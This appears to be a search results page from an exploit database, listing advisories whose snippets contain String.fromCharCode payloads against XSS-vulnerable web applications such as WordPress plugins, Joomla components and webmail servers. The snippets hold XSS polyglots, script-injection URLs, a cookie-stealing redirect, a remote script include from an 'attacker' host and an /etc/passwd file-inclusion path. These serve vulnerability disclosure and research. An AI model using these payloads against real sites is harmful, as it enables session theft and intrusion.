Total Results
87
Platform
Type
Author
Nagl XOOPS Dictionary Module 1.0 - Multiple Cross-Site Scripting Vulnerabilities
CyruxNET
webapps
... of this issue depends on the context of the dynamic web site developed with the XOOPS software and the XOOPS dictionary module and so cannot accurately be outlined here.
script>
function xss (){
var tag=String.fromCharCode(60)+String.fromCharCode(105)+
String.fromCharCode(109 ...
Nagl XOOPS Dictionary Module 1.0 - Multiple Cross-Site Scripting Vulnerabilities
CyruxNET
webapps
... of this issue depends on the context of the dynamic web site developed with the XOOPS software and the XOOPS dictionary module and so cannot accurately be outlined here.
script>
function xss (){
var tag=String.fromCharCode(60)+String.fromCharCode(105)+
String.fromCharCode(109 ...
WordPress Plugin WP-SendSms 1.0 - Multiple Vulnerabilities
expl0i13r
webapps
... to attacker website : # In my case this will redirect you to http://blackpentesters.blogspot.com+cookies <input type="text" name="maximum_characters" class="maximum_characters" id="maximum_characters" value=""><script>location=String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116 ...
Novell NetStorage 2.0.1/3.1.5 - Multiple Remote Vulnerabilities
Bugs NotHugs
remote
... The following examples are available: Cross-site scripting: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--> </SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT ...
WordPress Plugin Uploadify Integration 0.9.6 - Multiple Cross-Site Scripting Vulnerabilities
waraxe
webapps
... /plugins/uploadify-integration/views/scripts/ shortcode/index.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script> http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?buttontext="><script>alert(String.fromCharCode(88,83,83 ...
Apple Safari 3 for Windows - Protocol Handler Command Injection
Thor Larholm
remote
... for Windows Beta 3.0.1 <html><body> <iframe src='gopher://example.com" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows ...
escon supportportal pro 3.0 - Persistent Cross-Site Scripting
loneferret
webapps
... be enabled in the configuration Injection Point: Body Injection Payload(s): 1: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode ...
xeams email server 4.4 build 5720 - Persistent Cross-Site Scripting
loneferret
webapps
... 23 Jul 2012: Update from CERT: No response from vendor 08 Aug 2012: Public Disclosure Installed On: Windows Server 2003 SP2 Client Test OS: Window 7 Pro SP1 (x86) Browser Used: Internet Explorer 9 Injection Point: Body Injection Payload(s): 1: ';alert(String.fromCharCode(88,83,83 ...
Joomla! Component MS Comment 0.8.0b - Security Bypass / Cross-Site Scripting
Jeff Channell
webapps
... is vulnerable; other versions may also be affected. The following example commands are available: " onmouseover="alert(String.fromCharCode(88,83,83)) " style="color:expression(alert(String.fromCharCode(88,83,83))) ...
Joomla! Component EasyBook 2.0.0rc4 - Multiple HTML Injection Vulnerabilities
Jeff Channell
webapps
... example input is available:
[img]fake.png" onerror="alert(String.fromCharCode(88,83,83))[/img]
foo.com" onmouseover="alert(String.fromCharCode(88,83,83));return false;
' onclick="alert('XSS')"
" onclick="alert('xss')" ...
WordPress Plugin simplemail 1.0.6 - Persistent Cross-Site Scripting
loneferret
webapps
... 12 Injection Points: To, From, Date, Subject Injection Payload(s): 1: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83 ...
PHP Scripts Now (Multiple Products) - 'bios.php?rank' Cross-Site Scripting
599eme Man
webapps
... /bios.php?rank=%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E http://www.example.com/presidents/bios.php?rank=%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E ...
Mozilla Firefox 3.6.3 / Safari 4.0.5 - Access Violation Exception and Unknown Exception
Fredrik Nordberg Almroth
dos
... <!-- By: Fredrik Nordberg Almroth URL: http://h.ackack.net/ --> <script> var a=String.fromCharCode ...
WordPress MU 1.2.2 < 1.3.1 - '/wp-includes/wpmu-functions.php' Cross-Site Scripting
Juan Galiana Lara
webapps
... An attacker can exploit this issue by enticing an unsuspecting user to follow a malicious URI. The following proof of concept is available: curl -H "Cookie: my cookies here" -H "Host: <body onload=alert(String.fromCharCode(88,83,83))>" http://www.example.com/wp-admin/profile.php> tmp.html $ firefox tmp.html ...
T-dah Webmail Client 3.2.0-2.3 - Persistent Cross-Site Scripting
loneferret
webapps
... ) SP1 Browser Used: Internet Explorer 9 Injection Point: Body Injection Payload(s): 1: <SCRIPT SRC=http://attacker/xss.js></SCRIPT> 2: <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 3: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert ...
winwebmail server 3.8.1.6 - Persistent Cross-Site Scripting
loneferret
webapps
...
Injection Payload(s):
1: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
2: <SCRIPT>alert('XSS')</SCRIPT>
3 ...
Catviz 0.4.0 beta1 - Local File Inclusion / Cross-Site Scripting
ByALBAYX
webapps
... ://c4team.org/ [Path] /index.php?userman_form=../../../../../../../../../../../../../etc/passwd%00 @ @ @ @ XSS :/ @ @ @ http://c4team.org/ [Path] /index.php?userman_form=<script>alert(String.fromCharCode( 66, 89, 65, 76, 66, 65, 89, 88))</script> @ @ http://c4team.org/ [Path] /index.php ...
Opera 9.61 - 'opera:historysearch' Code Execution
Aviv Raff
remote
... <!--
--Aviv.
http://aviv.raffon.net/2008/10/30/AdifferentOpera.aspx
-->
<html>
<script>
function x() {
window.open('opera:historysearch?q=%2A"><img src=\'x\' onerror=\'eval(String.fromCharCode ...
e-Soft24 Jokes Portal Script Seo 1.0 - Multiple Cross-Site Scripting Vulnerabilities
599eme Man
webapps
... ?what='"><SCRIPT>alert(String.fromCharCode(88%2C83%2C83))<%2FSCRIPT><MARQUEE+BGCOLOR%3D"RED"><H1>Xss<%2FH1><%2FMARQUEE>&ssub=GO http://www.example.com/forgot.html => put : '"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><MARQUEE BGCOLOR="RED"><H1>Xss</H1></MARQUEE> http ...
vBulletin Radio and TV Player AddOn - HTML Injection
d3v1l
webapps
... ://www.vbulletin.org/forum/showthread.php?t=152037&page=2 Note:- - To exploit this Bug need to be registred!and after you are registered you can add new radio station where name station can be "><script>alert(String.fromCharCode(88,83,83))</script> and URL "><script>alert ...
S9Y Serendipity Freetag-plugin 3.21 - 'index.php' Cross-Site Scripting
Stefan Schurtz
webapps
... /tag/hallo=><body onload=alert(666)> http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(String.fromCharCode(88,83,83))> http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(666)> http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(String.fromCharCode(88,83,83))> ...
